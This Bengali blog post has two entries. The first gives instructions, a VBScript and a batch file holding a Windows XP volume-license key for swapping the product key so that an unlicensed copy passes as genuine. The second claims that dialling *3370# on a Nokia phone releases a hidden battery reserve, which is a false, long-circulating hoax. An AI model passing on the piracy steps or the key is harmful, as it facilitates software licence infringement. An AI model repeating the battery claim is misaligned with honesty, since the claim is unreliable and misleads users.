সিরিয়াল কি যেভাবে চেঞ্জ করবেন

Run.bat ফাইল এ যে সিরিয়াল কি দেয়া আছে, সেটা কাজ নাও করতে পারবে, এর জন্য সিরিয়াল কি চেঞ্জ করতে হবে। আমি ১০০টা সিরিয়াল কি দিয়ে দিয়েছি, আর নেট এ সিরিয়াল কি পাওয়া ব্যাপার না, তবে যেভাবে সিরিয়াল কি টা চেঞ্জ করবেন তা হল–

Run.bat নামের ফাইলে রাইট ক্লিক করে ইডিটে ক্লিক করুন ওখানে যেই নাম্বারটা আছে সেটা বদল করে নিউ নাম্বার দিয়ে দিন তার পর সেভ করে Run.bat ফাইলটি আবার ডাবল ক্লিক করুন, হয়ে যাবে।চেক করতে চাইলে আগের মত চেক করে নিন।

এবার এই কোড বানান নিজেই

১// নোটপেড ওপেন করে নিচের কোড গুলো ChangeKeyXP.vbs নামে সেভ করুন।
ON ERROR RESUME NEXT

if Wscript.arguments.count<1 then
Wscript.echo "Script can't run without VolumeProductKey argument"
Wscript.echo "Correct usage: Cscript ChangeKeyXP.vbs ABCDE-FGHIJ-KLMNO-PRSTU-WYQZX"
Wscript.quit
end if

Dim VOL_PROD_KEY
VOL_PROD_KEY = Wscript.arguments.Item(0)
VOL_PROD_KEY = Replace(VOL_PROD_KEY,"-","") 'remove hyphens if any

for each Obj in GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf ("win32_WindowsProductActivation")

result = Obj.SetProductKey (VOL_PROD_KEY)

if err <> 0 then
WScript.Echo Err.Description, "0x" & Hex(Err.Number)
Err.Clear
end if

Next
২// এখন নিচের কোড গুলো নতুন একটা নোটপেড অপেন করে Run.bat নামে সেভ করুন
Cscript ChangeKeyXP.vbs BKQW7-3JYTB-D26TX-DHPDM-3MTKG
৩// জেনুইন করতে চাইলে Run.bat নামের ফাইলে ডাবল ক্লিক করুন। জেনুইন চেক করতে ও সিরিয়াল কি চেন্জ করুন আগের মত করে।

বুধবার, ৭ নভেম্বর, ২০১২

নোকিয়া মোবাইলে লো ব্যটারিতে ও কল করুন অনায়াসে

আপনাদের সাথে একটি বিশেষ ট্রিক শেয়ার করব যে কিভাবে মোবাইলে লো ব্যাটারিতে অনায়াসে কথা বলা যায় ।
ধরুন আপনার নকিয়া মোবাইল এ ব্যাটারি লো। কিন্তু আপনার খুব গুরুত্বপূর্ন একটা কল করা দরকার…হাতের কাছে চার্জার নেই। সেক্ষেত্রেও আপনি কল করতে পারেন । নকিয়া কিছু চার্জ রিজার্ভ করে রাখে । আপনি সেই রিজার্ভ চার্জ ব্যবহার করে কথা বলতে পারবেন… সে ক্ষেত্রে আপনাকে “*3370#” চাপতে হবে(কোটেশন বাদে)।আপনার মোবাইল টি রিস্টার্ট হবে, তারপর যখন চালু হবে আপনি আপনার ব্যাটারী লেভেল ৫০% বেড়ে গেছে দেখবেন……এখন আপনি আপনার গুরুত্তপূর্ন কল টি সেরে ফেলুন।
ডিএ্যাকটিভ করতে#3370# চাপুন। আপনি যখন আপনার মোবাইল আবার চার্জ এ লাগাবেন তখন ওই শেষ হয়ে যাওয়া রিজার্ভ চার্জ আবার অটোমেটিক চার্জড হয়ে যাবে।
[বিঃদ্রঃ সকল মোবাইল-এ এই প্রক্রিয়া কাজ নাও করতে পারে ]।